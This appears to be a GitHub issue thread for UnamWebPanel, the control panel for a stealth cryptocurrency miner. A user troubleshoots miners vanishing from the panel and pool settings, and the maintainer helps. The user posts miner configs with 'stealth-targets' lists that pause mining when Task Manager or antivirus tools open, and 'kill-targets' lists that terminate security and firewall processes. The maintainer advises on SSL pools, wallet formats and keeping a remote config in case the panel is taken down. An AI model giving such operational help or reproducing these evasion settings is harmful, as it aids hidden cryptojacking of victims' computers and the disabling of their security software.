UnamSanctam / UnamWebPanel

MIT License
164 stars 61 forks source link

UnamWebPannel the miners is hidden #286

Open flockedsolid opened 8 months ago

flockedsolid commented 8 months ago

UnamWebPannel the miners are hidden, I was testing and had 10 miners and out of nowhere it dropped to 4 and it no longer shows them on the panel, only in the statistics. (I didn't remove any miner through the panel)

it appears that it is online, offline in the statistics, but in the mining panel, it does not show any miner, neither online nor offline, and some have disappeared

my connections is missing what happened 1 2

UnamSanctam commented 8 months ago

Hmm, from your image it looks like the datatable never loads, if you open the developer console then are there any errors in the console?

flockedsolid commented 8 months ago

Some errors are appearing now and the hashrate and miners are not matching, what is happening?

2 1

flockedsolid commented 8 months ago

remote url is needed? i just using api endpoint and the config is inside the miner build

UnamSanctam commented 8 months ago

remote url is needed? i just using api endpoint and the config is inside the miner build

No though having a "Remote Configuration" is very recommended since it's possible that your web panel can get taken down.

Some errors are appearing now and the hashrate and miners are not matching, what is happening?

The pool hashrate should never really match the real hashrate since pools calculate hashrate very differently from the real hashrate, pools calculate the amount of shares submitted during some interval (https://github.com/UnamSanctam/SilentCryptoMiner/wiki#why-is-the-hashrate-shown-on-the-pool-different-from-what-i-expect-or-from-what-is-shown-in-the-web-panel) while the web panel shows the real hashrate of the miner.

The "Error" and "Stopped" means that those miner cannot connect to that pool server with your settings. So either there is something wrong with your settings or those computers are unable to contact those pool servers.

flockedsolid commented 8 months ago

RVN Config { "url": "stratum://WALLET.Tower1@us-rvn.2miners.com:6060", "algo": "kawpow", "max-gpu": 60, "idle-wait": 5, "idle-gpu": 30, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AnVir.exe,PLlhDBWxRt.exe,GPU-Z.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe,ffxiv.exe,ffxiv_dx11.exe,MSIAfterburner.exe", "kill-targets": "MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe", "stealth-fullscreen": true }

XMR { "algo": "rx/0", "pool": "octopus.unmineable.com", "port": 443, "wallet": "wallet", "password": "", "nicehash": false, "ssltls": true, "max-cpu": 50, "idle-wait": 5, "idle-cpu": 20, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe", "kill-targets": "", "stealth-fullscreen": true }

flockedsolid commented 8 months ago

can u check my remote is it correct for rvn? ill add https://pastebin.com/6u4hZt0K

UnamSanctam commented 8 months ago

RVN looks correct though sometimes the US servers can be blocked in other countries, and you can also change it to use SSL if you want a secure connection, to do that change stratum:// to stratums:// and change the port from 6060 to 16060

For the XMR that doesn't seem right at all, why are you trying to mine the Octopus GPU mining algorithm on a CPU? And what are you trying to get paid in? Unmineable is just a cryptocurrency exchange where you can mine some coin (like XMR) and then they exchange the XMR for you and pay you in some other currently.

flockedsolid commented 8 months ago

now its okay? { "url": "stratums://wallet.Tower1@rvn.2miners.com:16060", "algo": "kawpow", "max-gpu": 40, "idle-wait": 5, "idle-gpu": 40, "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,AnVir.exe,PLlhDBWxRt.exe,GPU-Z.exe,regedit.exe,Autoruns.exe,adwcleaner.exe,CCleaner64.exe,bitdefender.exe,kaspersky.exe,panda.exe,zoneAlarm.exe,Malwarebytes.exe,defender.exe,eset.exe,360.exe,IObit.exe,ffxiv.exe,ffxiv_dx11.exe,MSIAfterburner.exe", "kill-targets": "MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe", "stealth-fullscreen": true }

xmr im trying to mine XMR on unmineable i fixed the url to rx.unmineable.com:443

UnamSanctam commented 8 months ago

Yes that should be good.

For Unmineable then you also need to specify that you want to be paid out in XMR if you don't already. So the wallet you enter should be: XMR:XMR_WALLET.WorkerName (a worker name is required on Unmineable). Though generally Unmineable isn't recommended if you're just mining XMR since you could just use a real XMR pool instead.

flockedsolid commented 8 months ago

which XMR pool i can use?

UnamSanctam commented 8 months ago

You can use 2miners, since you already use that for RVN.